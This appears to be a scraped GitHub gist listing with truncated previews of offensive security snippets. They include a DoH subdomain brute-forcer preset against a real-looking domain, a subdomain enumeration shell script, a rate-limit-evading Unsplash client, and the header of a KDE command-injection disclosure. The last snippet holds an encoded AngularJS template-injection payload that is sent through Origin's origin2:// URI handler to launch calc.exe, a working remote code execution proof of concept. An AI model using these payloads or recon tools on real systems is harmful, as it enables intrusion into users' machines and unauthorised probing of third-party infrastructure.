This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Developer: Marzavec ( https://github.com/marzavec ) | |
Description: A simple browser-based subdomain bruteforcing script, using DoH providers. Developed as a 5 minute hack, just to see it's preformance. Many improvements could be made, such as adding error handling or informing the user when the script is done. | |
Usage: Open the browsers dev console (usually F12), paste this script, change the `rootTld`, press enter to run. Ezpz. | |
*/ | |
const rootTld = 'lyka.pro'; // change to your target's root tld | |
// url to newline seperated wordlist | |
const wordlistUrl = 'https://raw.githubusercontent.com/rbsec/dnscan/master/subdomains.txt'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
_ _ | |
_______ _ __ ___ | | ___ | | | |
|_ / _ \ '__/ _ \ | |/ _ \| | | |
/ / __/ | | (_) || | (_) | | | |
/___\___|_| \___(_)_|\___/|_| | |
https://zero.lol | |
zero days 4 days | |
Title: KDE 4/5 KDesktopFile Command Injection | |
Date: July 28th 2019 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
_ _ | |
_______ _ __ ___ | | ___ | | | |
|_ / _ \ '__/ _ \ | |/ _ \| | | |
/ / __/ | | (_) || | (_) | | | |
/___\___|_| \___(_)_|\___/|_| | |
https://zero.lol | |
zero days 4 days | |
ATTENTION: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# requires | |
# https://github.com/zeropwn/spyse.py | |
DOMAINS_LOC=/tmp/subdomains.txt | |
spyse -target $1 -param domain --sub > $DOMAINS_LOC; | |
domains=`cat $DOMAINS_LOC | sed '1,12d'` | |
for d in $domains; | |
do | |
getent hosts $d | awk '{print $1}' | |
done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
import json | |
import requests | |
import argparse | |
import urllib.parse | |
SEARCH_URL = "https://unsplash.com/napi/search/photos" | |
p = argparse.ArgumentParser(description="Non-Ratelimited Unsplash API Client") | |
p.add_argument('-s', help="search query") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
// pop calc.exe | |
var payload = '%u007b%u007b%u0061%u003d%u0074%u006f%u0053%u0074%u0072%u0069%u006e%u0067%u0028%u0029%u002e%u0063%u006f%u006e%u0073%u0074%u0072%u0075%u0063%u0074%u006f%u0072%u002e%u0070%u0072%u006f%u0074%u006f%u0074%u0079%u0070%u0065%u003b%u0061%u002e%u0063%u0068%u0061%u0072%u0041%u0074%u003d%u0061%u002e%u0074%u0072%u0069%u006d%u003b%u0024%u0065%u0076%u0061%u006c%u0028%u0027%u0061%u002c%u004f%u0072%u0069%u0067%u0069%u006e%u002e%u0063%u006c%u0069%u0065%u006e%u0074%u002e%u0064%u0065%u0073%u006b%u0074%u006f%u0070%u0053%u0065%u0072%u0076%u0069%u0063%u0065%u0073%u002e%u0061%u0073%u0079%u006e%u0063%u004f%u0070%u0065%u006e%u0055%u0072%u006c%u0028%u0022%u0063%u0061%u006c%u0063%u002e%u0065%u0078%u0065%u0022%u0029%u002c%u0061%u0027%u0029%u007d%u007d'; | |
window.location = 'origin2://game/launch?offerIds=0&title='+payload; | |
</script> |